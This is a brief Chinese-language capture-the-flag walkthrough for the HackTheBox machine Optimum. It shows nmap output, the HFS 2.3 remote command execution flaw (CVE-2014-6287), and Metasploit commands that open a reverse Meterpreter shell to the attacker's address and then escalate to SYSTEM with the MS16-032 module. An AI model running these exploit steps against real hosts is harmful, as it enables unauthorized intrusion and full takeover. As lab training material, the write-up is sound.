Optimum - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/6

• 10.10.10.8

端口扫描

只有一个80:

$ nmap -sC -sV 10.10.10.8
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-08 14:00 CST
Nmap scan report for 10.10.10.8
Host is up (0.071s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.89 seconds

80

是一个HFS 2.3:

搜索得到相关漏洞：

• Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) - Windows webapps Exploit
  https://www.exploit-db.com/exploits/49125

CVE-2014-6287

直接msf一键打：

use exploit/windows/http/rejetto_hfs_exec
set rhosts 10.10.10.8
set lhost 10.10.14.5
exploit

meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

user flag

直接当前用户桌面得到user.txt:

提权信息

直接msf收集信息：

use post/multi/recon/local_exploit_suggester

得到结果，ms16-032:

ms16_032

还是msf一键打，打到system shell：

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

root flag

Administrator用户桌面得到root.txt:

参考资料

• Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) - Windows webapps Exploit
  https://www.exploit-db.com/exploits/49125
• https://www.hackthebox.eu/home/machines/writeup/6
• HackTheBox - Optimum - YouTube
  https://www.youtube.com/watch?v=kWTnVBIpNsE&feature=youtu.be&ab_channel=IppSec